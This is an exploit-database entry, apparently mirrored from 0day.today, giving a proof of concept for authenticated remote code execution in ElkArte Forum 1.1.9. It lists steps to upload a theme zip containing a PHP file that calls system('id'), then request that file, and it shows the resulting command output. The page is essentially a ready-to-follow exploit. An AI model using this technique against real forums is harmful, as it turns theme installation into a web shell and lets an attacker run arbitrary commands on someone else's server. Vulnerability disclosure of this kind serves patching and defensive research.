Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtTmrswrr1337DAY-ID-39626
HistoryMay 28, 2024 - 12:00 a.m.

ElkArte Forum 1.1.9 Remote Code Execution Vulnerability

2024-05-2800:00:00
tmrswrr
0day.today
108
elkarte forum
rce
authenticated
webapps
vulnerability
remote code execution
theme installation
file upload
security issue
exploit

7.4 High

AI Score

Confidence

Low

JSON
# Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) 
# Exploit Author: tmrswrr
# Category: Webapps
# Vendor Homepage: https://www.elkarte.net/
# Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArte_v1-1-9_install.zip
# Version : 1.1.9


1) After login go to Manage and Install theme > https://127.0.0.1/ElkArte/index.php?action=admin;area=theme;sa=admin;c2e3e39a0d=276c2e3e39a0d65W2qg1voAFfX1yNc5m
2) Upload test.zip file and click install > test.zip > test.php > <?php echo system('id'); ?>
3) Go to Theme Setting > Theme Directory > https://127.0.0.1/ElkArte/themes/test/test.php
Result : uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte)

7.4 High

AI Score

Confidence

Low

JSON